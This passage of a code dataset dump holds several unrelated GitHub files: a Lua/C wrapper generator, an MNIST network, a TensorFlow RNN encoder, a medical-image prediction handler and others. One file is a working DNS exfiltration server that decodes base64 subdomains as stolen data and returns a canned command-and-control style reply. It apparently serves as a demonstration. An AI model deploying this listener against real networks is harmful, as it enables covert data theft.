20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\t\r\n\t\t\tif self.contlinea >= 14:\r\n\t\t\t\tlv_pagina = lv_pagina + 1\r\n\t\t\t\tself.cnv.showPage()\r\n\t\t\t\tself.contlinea = 1\r\n\t\t\t\tself.imprimir_encabezado = 1\r\n\t\tif self.detallado == 1:\r\n\t\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\t\tself.linea = self.linea + 15\r\n\t\t\tself.cnv.drawString(35, h - self.linea, \"Totales del Tutor: \")\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalTutorEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalTutorProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalTutorSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalTutorDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalTutorRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalTutorApps))\r\n\t\t\tself.linea = self.linea + 20\r\n\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\tself.linea = self.linea + 2\r\n\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\tself.linea = self.linea + 20\r\n\t\tself.cnv.drawString(35, h - self.linea, \"Totales General PNF: \")\r\n\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalGeneralEstudiantes))\r\n\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalGeneralProyectos))\r\n\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalGeneralSInformacion))\r\n\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalGeneralDWeb))\r\n\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalGeneralRedes))\r\n\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalGeneralApps))\r\n\r\n\t\tself.cnv.showPage()\r\n\t\tself.cnv.save()\r\n\t\t# Opening the PDF file\r\n\t\twb.open_new(self.archivo2)\r\n\r\n\tdef cerrar(self):\r\n\t\tself.close()\r\n\r\n\r\n# Constructor to run this module standalone from the main program; uncomment to test\r\n\r\n#app = QApplication(sys.argv)\r\n#PEstadistica = DialogoEstadistica()\r\n#PEstadistica.show()\r\n#app.exec_()\r\n","repo_name":"amayale69/BIDIPROYECT","sub_path":"estadisticas.pyw","file_name":"estadisticas.pyw","file_ext":"pyw","file_size_in_byte":47843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} 
+{"seq_id":"4757465824","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom pprint import pprint\nfrom string import Template\nimport argparse\nimport sys, os\n\n# This is not required if you've installed pycparser into\n# your site-packages/ with setup.py\nsys.path.extend(['.', '..'])\n\nfrom pycparser import c_parser, c_ast, parse_file\n\nscriptpath = \"./codeTemplate.py\"\nsys.path.append(os.path.abspath(scriptpath))\nfrom codeTemplate import *\n\n\nclass FuncCallVisitor(c_ast.NodeVisitor):\n def __init__(self):\n # [ { name : xxx, return : xxx, params : [ { name : xxx, ref : 0 }, ...] }, ... ]\n self.functions = []\n self.typedefs = []\n self.typedefs_struct = []\n self.primitive_types = ['void', 'short','int','long','unsigned short','unsigned int', 'unsigned long']\n\n def search_typedef( self, type_name) : \n for item in self.typedefs :\n #print(item)\n if item['name'] == type_name :\n return item['type_origin']\n return 'unknown'\n\n def dump(self):\n return { 'func' : self.functions , 'typedef' : self.typedefs, 'typedef-struct' : self.typedefs_struct }\n\n def visit_FuncDecl (self, node):\n #if isinstance(node, c_ast.FuncDecl):\n # pass\n func = {}\n params = []\n # parameter\n if isinstance(node.args, c_ast.ParamList):\n unnamed_counter = 10\n for param in node.args.params :\n ptr = 0\n args_list = { 'ptr' : 0 } \n if isinstance(param, c_ast.Decl): \n # named parameter\n args_list['direction'] = param.name\n else:\n args_list['direction'] = 'in'+str(unnamed_counter) # c_ast.Typename\n unnamed_counter = unnamed_counter + 1\n\n if isinstance(param.type, c_ast.PtrDecl):\n args_list['ptr'] = 1\n args_list['type'] = ' '.join(param.type.type.type.names)\n if isinstance(param.type, c_ast.TypeDecl):\n args_list['type'] = ' '.join(param.type.type.names)\n\n params.append(args_list)\n\n func['params'] = params\n # function name\n if isinstance(node.type, c_ast.TypeDecl):\n #print(\"TypeDecl:\", node.type.declname )\n func['name'] = node.type.declname\n # return type\n if isinstance(node.type.type, c_ast.IdentifierType):\n #print(\"IdentifierType:\", node.type.type.names[0] )\n func['return'] = ' '.join(node.type.type.names)\n self.functions.append(func)\n\n def visit_TypeDecl (self, node):\n typedef = {}\n params = []\n if isinstance(node.type, c_ast.IdentifierType):\n typedef['name'] = node.declname\n typedef['type'] = ' '.join(node.type.names)\n if typedef['type'] in self.primitive_types :\n typedef['type_origin'] = typedef['type']\n else:\n # find from self.typedefs\n typedef['type_origin'] = self.search_typedef( typedef['type'] )\n self.typedefs.append(typedef)\n elif isinstance(node.type, c_ast.Struct):\n typedef['name'] = node.type.name\n for param in node.type.decls :\n params.append( { 'name' : param.type.declname ,'type' : ' '.join(param.type.type.names) })\n typedef['type'] = params\n self.typedefs_struct.append(typedef)\n typedef['type_origin'] = 'struct'\n self.typedefs.append(typedef)\n else:\n pass \n\n\n\nclass CodeGenerator ( codeTemplate ):\n def __init__ (self, symtab) :\n self.product = 'CL'\n self.product_lib_name = 'cl_calc'\n self.symtab = symtab\n self.primitive_types = ['void', 'short','int','long','unsigned short','unsigned int', 'unsigned long']\n\n def search_type(self, searchType) :\n for typedef in self.symtab['typedef'] :\n if typedef['name'] == searchType : \n if typedef['type_origin'] != 'struct' :\n return typedef['type_origin']\n else:\n return typedef['name']+'_s'\n # primitive type already. 
just return it\n return searchType \n \n def find_type(self, searchType) :\n if searchType in self.primitive_types :\n return 1\n for typedef in self.symtab['typedef'] :\n if typedef['name'] == searchType : \n if typedef['type_origin'] in self.primitive_types :\n return 1\n else:\n return 0\n return 0\n\n def print_pointer(self, ptr) :\n if ptr == 1 :\n return '*'\n else:\n return ''\n\n def print_void(self, ptr) :\n if ptr == 'void' :\n return ' 300; '\n else:\n return ''\n \n def print_ref(self, ptr) :\n if ptr == 1 :\n return ''\n else:\n return '&'\n\n def print_r_ref(self, ptr) :\n if ptr == 1 :\n return '&'\n else:\n return ''\n\n def print_comma(self, idx) :\n if idx == 0 :\n return ''\n else:\n return ','\n\n def print_ret(sefl, type) :\n if type == 'void' :\n return '300; (void)'\n else:\n return ''\n\n def print_getfield_stmt(self, param_name, field_name, field_type, stack_index) :\n # More can be done for field_type\n stmt = '\\n\\t\\tlua_getfield(L, '+str(stack_index)+', \"'+field_name +'\");'\n stmt = stmt + '\\n\\t\\tSTACK_DUMP(L);'\n stmt = stmt + '\\n\\t\\tif( lua_type(L, -1) == LUA_TNIL ) { '+self.print_err_stmt (301) +'}'\n stmt = stmt + '\\n\\t\\t'+param_name+'.'+field_name+' = lua_tonumber(L, -1); lua_pop(L, 1);' \n stmt = stmt + '\\n\\t\\tSTACK_DUMP(L);'\n return stmt\n\n def print_setfield_stmt(self, param_name, field_name, field_type) :\n stmt = '\\n\\tlua_pushstring(L, \"'+field_name +'\"); /* push key */'\n stmt = stmt + '\\n\\tSTACK_DUMP(L);'\n stmt = stmt + '\\n\\tlua_pushnumber(L, '+param_name+'.'+field_name+'); /* push value */'\n stmt = stmt + '\\n\\tSTACK_DUMP(L);'\n stmt = stmt + '\\n\\tlua_settable(L, -3);'\n stmt = stmt + '\\n\\tSTACK_DUMP(L);'\n return stmt\n \n\n def print_err_stmt(sefl, errcode) :\n stmt = '\\n\\t\\t\\terrcode = 301; /* not supported types */'\n stmt = stmt +'\\n\\t\\t\\tlua_pushnumber( L, errcode );'\n stmt = stmt +'\\n\\t\\t\\tSTACK_DUMP(L);'\n stmt = stmt +'\\n\\t\\t\\treturn 1;'\n return stmt \n\n def gen_func_register(self):\n self.lib_main = open('./'+self.product.upper()+'_LUA.c', 'w') \n self.lib_wrapper = open('./'+self.product.upper()+'_LUA.include', 'w')\n\n func_list = ''\n # func\n for idx, func in enumerate(self.symtab['func']) :\n num_result = 1 # at least 1 result\n arg_list = ''\n param_list = ''\n fetch_stmt = ''\n push_stmt = ''\n func_list = func_list + '\\n\\t\\t{\"'+func['name']+'\" , l_'+func['name']+'},'\n req_counter = 1\n for idx2, param in enumerate(func['params']):\n\n \n if param['direction'].startswith('in') and not param['direction'].startswith('inout'):\n if self.find_type(param['type']) :\n arg_list = arg_list + self.print_comma(idx2) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n fetch_stmt = fetch_stmt +'\\n\\t'+param['direction']+' = luaL_checknumber ( L, '+str(req_counter)+' );'\n else:\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n fetch_stmt = fetch_stmt + '\\n\\tif (lua_type( L, '+str(req_counter)+' ) == LUA_TTABLE ) {'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n fetch_stmt = fetch_stmt + self.print_getfield_stmt( param['direction'], udata_member['name'], udata_member['type'], req_counter)\n fetch_stmt = fetch_stmt + '\\n\\t} else {'+self.print_err_stmt(301)+'\\n\\t}'\n req_counter = req_counter + 1\n\n if 
param['direction'].startswith('inout'):\n if self.find_type(param['type']) :\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n fetch_stmt = fetch_stmt +'\\n\\t'+param['direction']+' = luaL_checknumber ( L, '+str(req_counter)+' );'\n push_stmt = push_stmt + '\\n\\tlua_pushnumber( L, '+param['direction']+' );'\n else:\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n \n fetch_stmt = fetch_stmt + '\\n\\tif (lua_type( L, '+str(num_result)+' ) == LUA_TTABLE ) {'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n fetch_stmt = fetch_stmt + self.print_getfield_stmt( param['direction'], udata_member['name'], udata_member['type'], req_counter )\n fetch_stmt = fetch_stmt + '\\n\\t} else {'+self.print_err_stmt(301)+'\\n\\t}'\n\n push_stmt = push_stmt + '\\n\\tlua_newtable (L); /* create new table */'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n push_stmt = push_stmt + self.print_setfield_stmt( param['direction'], udata_member['name'], udata_member['type'])\n\n req_counter = req_counter + 1\n num_result = num_result + 1\n\n if param['direction'].startswith('out'):\n \n if self.find_type(param['type']) :\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) +param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+ param['direction']+';'\n push_stmt = push_stmt + '\\n\\tlua_pushnumber( L, '+param['direction']+' );'\n else:\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t'+param['type']+' '+param['direction'] +';'\n \n push_stmt = push_stmt + '\\n\\tlua_newtable (L);/* create new table */'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n push_stmt = push_stmt + self.print_setfield_stmt( param['direction'], udata_member['name'], udata_member['type'])\n num_result = num_result + 1\n \n\n stmt = Template(self.lua_wrapper_routine).safe_substitute( dict( \\\n func_name=func['name'], \\\n num_result=num_result, \\\n arg_list=arg_list, \\\n param_list=param_list, \\\n fetch_stmt=fetch_stmt, \\\n push_stmt=push_stmt, \\\n return_stmt=self.print_ret(func['return']) \\\n ))\n self.lib_wrapper.write(stmt)\n\n stmt = Template(self.lua_c_library).safe_substitute( dict( \\\n LIB_NAME=self.product.upper(), \\\n lib_name=self.product_lib_name, \\\n func_list=func_list \\\n ))\n self.lib_main.write( stmt ) \n self.lib_main.close()\n\n self.lib_wrapper.close()\n\n def gen(self):\n self.gen_func_register()\n\n\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser('Scan AST & Create Symbol Table')\n argparser.add_argument('filename', help='name of file to parse')\n args = argparser.parse_args()\n\n ast = parse_file(args.filename, use_cpp=False)\n #ast.show()\n #for (child_name, child) in ast.children():\n # child.show( sys.stdout ,\n # offset= 2,\n # attrnames=True,\n # nodenames=True,\n # showcoord=True,\n # _my_node_name=child_name)\n\n v = FuncCallVisitor()\n v.visit(ast)\n #pprint(v.dump())\n\n lua = CodeGenerator( v.dump() )\n lua.gen()\n\n 
\n\n","repo_name":"phyunsj/lua-to-c","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":13431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23165482828","text":"#!/usr/bin/env python3\nimport argparse\nimport io\nimport re\nimport socketserver\nimport struct\nimport sys\nimport base64\n\n\nPORT = 53\nHEADER = '!HBBHHHH'\nHEADER_SIZE = struct.calcsize(HEADER)\nDOMAIN_PATTERN = re.compile('^[A-Za-z0-9\\-\\.\\_]+$')\n\nclass DNSHandler(socketserver.BaseRequestHandler):\n\n def handle(self):\n socket = self.request[1]\n data = self.request[0]\n data_stream = io.BytesIO(data)\n\n # Read header\n (request_id, header_a, header_b, qd_count, an_count, ns_count, ar_count) = struct.unpack(HEADER, data_stream.read(HEADER_SIZE))\n\n # Read questions\n questions = []\n for i in range(qd_count):\n name_parts = []\n length = struct.unpack('B', data_stream.read(1))[0]\n while length != 0:\n name_parts.append(data_stream.read(length).decode('us-ascii'))\n length = struct.unpack('B', data_stream.read(1))[0]\n name = '.'.join(name_parts)\n\n if not DOMAIN_PATTERN.match(name):\n \n print('Invalid domain received: ' + name)\n # We are only responding to exfil requests\n return\n\n (qtype, qclass) = struct.unpack('!HH', data_stream.read(4))\n\n questions.append({'name': name, 'type': qtype, 'class': qclass})\n\n # Decode the sub_domain that is our exfil message\n exfil_hello = ''\n try:\n sub_domain = name.split('.')[0]\n # Fix URL based padding\n sub_domain += '=' * (4 - len(sub_domain) % 4)\n exfil_hello = base64.urlsafe_b64decode(sub_domain).decode('us-ascii')\n except:\n # Ignore any decoding errors\n return\n \n print('Exfil: ' + exfil_hello + ' from ' + str(self.client_address[0]) + ':' + str(self.client_address[1]))\n\n # Make response (note: we don't actually care about the questions, just return our canned response)\n response = io.BytesIO()\n\n # Header\n # Response, Authoriative\n response_header = struct.pack(HEADER, request_id, 0b10000100, 0b00000000, qd_count, 1, 0, 0)\n response.write(response_header)\n\n # Questions\n for q in questions:\n # Name\n for part in q['name'].split('.'):\n response.write(struct.pack('B', len(part)))\n response.write(part.encode('us-ascii'))\n response.write(b'\\x00')\n\n # qtype, qclass\n response.write(struct.pack('!HH', q['type'], q['class']))\n\n # Answer is always to decode and return the exfil based DNS name.\n # Normally, an attacker might reply with server:port to send exfil data\n answer = exfil_hello + \". 
Server reply: connect to 11.22.33.44:5678\"\n response.write(b'\\xc0\\x0c') # Compressed name (pointer to question)\n response.write(struct.pack('!HH', 16, 1)) # type: TXT, class: IN\n response.write(struct.pack('!I', 0)) # TTL: 0\n response.write(struct.pack('!H', len(answer) + 1)) # Record length\n response.write(struct.pack('B', len(answer))) # TXT length\n response.write(answer.encode('us-ascii')) # Text\n\n # Send response\n socket.sendto(response.getvalue(), self.client_address)\n\nif __name__ == '__main__':\n server = socketserver.ThreadingUDPServer(('', PORT), DNSHandler)\n print('Running on port %d' % PORT)\n\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n server.shutdown()\n","repo_name":"kengraf/DNSexfil","sub_path":"dns_exfil_server.py","file_name":"dns_exfil_server.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23827895331","text":"import numpy as np\nimport pickle\nimport math\nimport cv2\n\n\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\n\ndef sigmoid_prime(x):\n s = sigmoid(x)\n return s * (1-s) # derivative of sigmoid\n\n\nclass Network:\n\n def __init__(self, layer_sizes=None):\n if layer_sizes is None:\n layer_sizes = [784, 28, 20, 10]\n # create arrays to hold weights and biases\n self.w = [np.empty([layer_sizes[i-1], layer_sizes[i]]) for i in range(1, len(layer_sizes))]\n self.b = [np.empty(layer_sizes[i]) for i in range(1, len(layer_sizes))]\n\n def randomize_parameters(self):\n for n, (w, b) in enumerate(zip(self.w, self.b)):\n self.w[n] = np.random.rand(len(w), len(w[0]))\n self.b[n] = np.random.rand(len(b))\n\n def save_parameters(self, base_dir: str, file_name=\"params.byte\"):\n with open(base_dir + file_name, 'wb') as f:\n for w, b in zip(self.w, self.b):\n temp = w.dumps()\n f.write(len(temp).to_bytes(4, byteorder=\"big\"))\n f.write(w.dumps())\n temp = b.dumps()\n f.write(len(temp).to_bytes(4, byteorder=\"big\"))\n f.write(b.dumps())\n\n def read_parameters(self, base_dir: str, file_name=\"params.byte\"):\n with open(base_dir + file_name, 'rb') as f:\n for i in range(len(self.w)):\n temp = int.from_bytes(f.read(4), byteorder=\"big\")\n self.w[i] = pickle.loads(f.read(temp))\n temp = int.from_bytes(f.read(4), byteorder=\"big\")\n self.b[i] = pickle.loads(f.read(temp))\n\n def back_prop(self, images, expected_predictions):\n assert len(images) == len(expected_predictions)\n\n print(\"||||||||||||||||||||||||||||\")\n print(\"Cost @ Start: \", self.compute_cost(images, expected_predictions))\n\n for img, expected_prediction in zip(images, expected_predictions):\n y = [1 if i == expected_prediction else 0 for i in range(10)]\n\n # compute activation (a) of each layer (z --> before sigmoid application to a)\n z = [np.ndarray.astype(np.ndarray.flatten(img), dtype=float) / 255]\n a = z.copy() # no need to apply sigmoid before first layer\n for w, b in zip(self.w, self.b):\n z.append(np.add(np.matmul(a[-1], w), b)) # compute weighted sum from previous layer\n a.append(np.array([sigmoid(z_q) for z_q in z[-1]])) # activation value after applying sigmoid\n\n # allocate space to hold gradient - represent optimal change\n g_w, g_b = [np.empty_like(w) for w in self.w], [np.empty_like(b) for b in self.b]\n\n # allocate space to hold partial derivatives of cost with respect to all activation values\n dc_da = [np.empty_like(a_l) for a_l in a]\n\n # compute partial derivatives of cost with respect to activation values in final layer\n dc_da[-1] = [2 * 
(a_i - y_i) for a_i, y_i in zip(a[-1], y)]\n\n # compute the gradient via back-propagation through layers\n for l in range(len(a) - 1, 0, -1):\n # compute gradient with respect to biases\n for i, (dc_da_i, z_i) in enumerate(zip(dc_da[l], z[l])):\n g_b[l - 1][i] = dc_da_i * sigmoid_prime(z_i)\n\n # compute gradient with respect to weights\n for k, a_k in enumerate(a[l - 1]):\n for i, (g_b_i) in enumerate(g_b[l - 1]):\n g_w[l - 1][k][i] = g_b_i * a_k\n\n # compute gradient with respect to activations of previous layers - needed for next iteration\n for k in range(len(dc_da[l - 1])):\n # must sum over all connected activations in the current layer\n dc_da[l - 1][k] = 0\n for dc_da_i, g_b_i, w_ki in zip(dc_da[l], g_b[l - 1], self.w[l - 1][k]):\n dc_da[l - 1][k] += g_b_i * w_ki\n\n # change weights and biases in direction of negative gradient\n for w, b, g_w, g_b in zip(self.w, self.b, g_w, g_b):\n # change biases\n for i, g_b_i in enumerate(g_b):\n b[i] -= g_b_i / len(images)\n\n # change weights\n for r, g_w_r in enumerate(g_w):\n for c, g_w_rc in enumerate(g_w_r):\n w[r][c] -= g_w_rc / len(images)\n\n print(\"Cost @ End: \", self.compute_cost(images, expected_predictions))\n\n def compute_output(self, img):\n assert len(img) == len(img[0]) == 28\n\n output = np.ndarray.astype(np.ndarray.flatten(img), dtype=float)\n output /= 255 # normalize pixel values\n\n for w, b in zip(self.w, self.b):\n output = np.add(np.matmul(output, w), b) # compute weighted sum\n for i, o in enumerate(output):\n output[i] = sigmoid(o) # apply sigmoid function\n\n return output\n\n def compute_prediction(self, img):\n return int(np.argmax(self.compute_output(img))) # index of the most activated output, i.e. the predicted digit\n\n def compute_cost(self, images, expected_predictions):\n assert len(images) == len(expected_predictions)\n\n y = [[1 if i == p else 0 for i in range(10)] for p in expected_predictions]\n a = [self.compute_output(img) for img in images]\n # compute cost (sum of squares) averaged over all images\n return sum([sum([(a_i - y_i) ** 2 for a_i, y_i in zip(a_n, y_n)]) for a_n, y_n in zip(a, y)]) / len(images)\n","repo_name":"pateldeev/MNIST_NeuralNetwork","sub_path":"src/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16040224212","text":"from unicodedata import name\nimport requests\nimport json\n\n# The real token has been replaced with \"ваш_токен\" (\"your_token\") for security reasons.\n# The ids of my communities can be found in the file 'communities.json'\n\nurl = 'https://api.vk.com/method/groups.get?v=5.131&access_token=ваш_токен'\ncommunities = requests.get(url)\njson_communities = communities.json()\n#print(json_communities)\ninside_response = json_communities.get('response')\nresponse_items = inside_response.get('items')\ncommunities_object = {'communities': response_items}\nprint(response_items)\nwith open('communities.json', 'w', encoding='utf-8') as a:\n json.dump(communities_object, a)\n","repo_name":"Karadesh/Parsing_internet","sub_path":"lesson_1/Second_parse_vk.py","file_name":"Second_parse_vk.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"466159858","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ==============================================================================\n# \\file rnn.py\n# \\author chenghuige \n# \\date 2016-12-23 14:02:57.513674\n# \\Description \n# 
==============================================================================\n\n\"\"\"\nrnn encoding\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom melt.ops import dynamic_last_relevant\n\nimport copy\n \nclass EncodeMethod:\n forward = 0\n backward = 1\n bidrectional = 2 \n bidrectional_sum = 3\n\nclass OutputMethod:\n sum = 0\n last = 1\n first = 2\n all = 3\n\ndef forward_encode(cell, inputs, sequence_length, initial_state=None, dtype=None, output_method=OutputMethod.last):\n outputs, state = tf.nn.dynamic_rnn(\n cell, \n inputs, \n initial_state=initial_state, \n dtype=dtype,\n sequence_length=sequence_length)\n \n #--seems slower convergence and not good result when only using last output, so change to use sum\n if output_method == OutputMethod.sum:\n return tf.reduce_sum(outputs, 1), state\n elif output_method == OutputMethod.last:\n return dynamic_last_relevant(outputs, sequence_length), state\n elif output_method == OutputMethod.first:\n return outputs[:, 0, :], state\n else:\n return outputs, state\n\ndef backward_encode(cell, inputs, sequence_length, initial_state=None, dtype=None, output_method=OutputMethod.last):\n outputs, state = tf.nn.dynamic_rnn(\n cell, \n tf.reverse_sequence(inputs, sequence_length, 1), \n initial_state=initial_state, \n dtype=dtype,\n sequence_length=sequence_length)\n\n #--seems slower convergence and not good result when only using last output, so change to use sum\n if output_method == OutputMethod.sum:\n return tf.reduce_sum(outputs, 1), state\n elif output_method == OutputMethod.last:\n return dynamic_last_relevant(outputs, sequence_length), state\n elif output_method == OutputMethod.first:\n return outputs[:, 0, :], state\n else:\n return outputs, state\n\ndef bidrectional_encode(cell_fw, \n cell_bw, \n inputs, \n sequence_length, \n initial_state_fw=None, \n initial_state_bw=None, \n dtype=None,\n output_method=OutputMethod.last,\n use_sum=False):\n if cell_bw is None:\n cell_bw = copy.deepcopy(cell_fw)\n if initial_state_bw is None:\n initial_state_bw = initial_state_fw\n\n outputs, states = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cell_fw,\n cell_bw=cell_bw,\n inputs=inputs,\n initial_state_fw=initial_state_fw,\n initial_state_bw=initial_state_bw,\n dtype=dtype,\n sequence_length=sequence_length)\n\n output_fws, output_bws = outputs\n\n if output_method == OutputMethod.sum:\n output_forward = tf.reduce_sum(output_fws, 1) \n elif output_method == OutputMethod.last:\n output_forward = dynamic_last_relevant(output_fws, sequence_length)\n elif output_method == OutputMethod.first:\n output_forward = output_fws[:, 0, :]\n else:\n output_forward = output_fws\n\n if output_method == OutputMethod.sum:\n output_backward = tf.reduce_sum(output_bws, 1) \n elif output_method == OutputMethod.last:\n output_backward = dynamic_last_relevant(output_bws, sequence_length)\n elif output_method == OutputMethod.first:\n output_backward = output_bws[:, 0, :]\n else:\n output_backward = output_bws\n\n if use_sum:\n output = output_forward + output_backward\n else:\n output = tf.concat(-1, [output_forward, output_backward])\n\n return output, states[0]\n\ndef encode(cell, \n inputs, \n sequence_length, \n initial_state=None, \n cell_bw=None, \n inital_state_bw=None, \n dtype=None,\n encode_method=EncodeMethod.forward, \n output_method=OutputMethod.last):\n \n #needed for bidirectional_dynamic_rnn and backward method\n #without it Input 'seq_lengths' of 
'ReverseSequence' Op has type int32 that does not match expected type of int64.\n #int tf.reverse_sequence seq_lengths: A `Tensor` of type `int64`.\n if initial_state is None and dtype is None:\n dtype = tf.float32\n sequence_length = tf.cast(sequence_length, tf.int64)\n if encode_method == EncodeMethod.forward:\n return forward_encode(cell, inputs, sequence_length, initial_state, dtype, output_method)\n elif encode_method == EncodeMethod.backward:\n return backward_encode(cell, inputs, sequence_length, initial_state, dtype, output_method)\n elif encode_method == EncodeMethod.bidrectional:\n return bidrectional_encode(cell, cell_bw, inputs, sequence_length, \n initial_state, inital_state_bw, dtype, output_method)\n elif encode_method == EncodeMethod.bidrectional_sum:\n return bidrectional_encode(cell, cell_bw, inputs, sequence_length, \n initial_state, inital_state_bw, dtype, output_method,\n use_sum=True)\n else:\n raise ValueError('Unsupported rnn encode method:', encode_method)","repo_name":"fword/hasky","sub_path":"util/melt/rnn/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34793760885","text":"import keras.backend as K\nfrom fastapi.encoders import jsonable_encoder\nimport retinopathy\nimport cardiac\nimport malaria\n\n\ndef predict(model, model_loaded, image_data):\n final_json = []\n if model == \"dia\":\n preds, pred_val = retinopathy.translate_retinopathy(\n model_loaded[\"model\"].predict_proba(image_data)\n )\n final_json.append(\n {\n \"empty\": False,\n \"type\": model_loaded[\"type\"],\n \"mild\": preds[0],\n \"mod\": preds[1],\n \"norm\": preds[2],\n \"severe\": preds[3],\n \"pred_val\": pred_val,\n }\n )\n elif model == \"oct\":\n preds, pred_val = cardiac.translate_oct(\n model_loaded[\"model\"].predict(image_data)\n )\n final_json.append(\n {\n \"empty\": False,\n \"type\": model_loaded[\"type\"],\n \"cnv\": preds[0],\n \"dme\": preds[1],\n \"drusen\": preds[2],\n \"normal\": preds[3],\n \"pred_val\": pred_val,\n }\n )\n\n elif model == \"mal\":\n preds, pred_val = malaria.translate_malaria(\n model_loaded[\"model\"].predict_proba(image_data)\n )\n final_json.append(\n {\n \"empty\": False,\n \"type\": model_loaded[\"type\"],\n \"para\": preds[0],\n \"unin\": preds[1],\n \"pred_val\": pred_val,\n }\n )\n\n else:\n warn = (\n \"Feeding blank image won't work. 
Please enter an input image to continue.\"\n )\n pred_val = \" \"\n final_json.append(\n {\n \"pred_val\": warn,\n \"para\": \" \",\n \"unin\": \" \",\n \"tumor\": \" \",\n \"can\": \" \",\n \"normal\": \" \",\n \"bac\": \" \",\n \"viral\": \" \",\n \"cnv\": \" \",\n \"dme\": \" \",\n \"drusen\": \" \",\n \"mild\": \" \",\n \"mod\": \" \",\n \"severe\": \" \",\n \"norm\": \" \",\n \"top1\": \" \",\n \"top2\": \" \",\n \"top3\": \" \",\n \"top4\": \" \",\n \"top5\": \" \",\n }\n )\n\n K.clear_session()\n result = jsonable_encoder(final_json[0])\n return result\n","repo_name":"ahrazarfi/api-medai","sub_path":"prediction_Handler.py","file_name":"prediction_Handler.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27597467584","text":"\"\"\"Console script for globality_black.\"\"\"\nimport multiprocessing as mp\nimport sys\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport click\n\nfrom globality_black.black_handler import get_black_mode\nfrom globality_black.constants import (\n ALL_DONE_STRING,\n NUM_FILES_TO_ENABLE_PARALLELIZATION,\n OH_NO_STRING,\n)\nfrom globality_black.diff import text_diff\nfrom globality_black.reformat_text import BlackError, reformat_text\n\n\n@click.command()\n@click.argument(\"path\", type=click.Path(readable=True, writable=True, exists=True))\n@click.option(\"--check/--no-check\", type=bool, default=False)\n@click.option(\"--verbose/--no-verbose\", type=bool, default=False)\n@click.option(\"--diff/--no-diff\", type=bool, default=False)\n# characters \\b needed to avoid click reformatting\n# see https://click.palletsprojects.com/en/7.x/documentation/#preventing-rewrapping\ndef main(path, check, diff, verbose):\n \"\"\"\n Run globality-black for a given path\n\n \\b\n * path:\n If path is a directory, apply to all .py files in any subdirectory\n Otherwise, apply just to the given filename.\n\n \\b\n * check:\n If --check is passed, do not modify the files and return:\n - exit code 1: if any file needs to be reformatted (or fails when applying black)\n - exit code 0: otherwise\n \\b\n If --check not passed (or --no-check is passed), attempt to reformat all paths returning\n - exit code 1: if any file fails\n - exit code 0: otherwise\n \\b\n Note that when 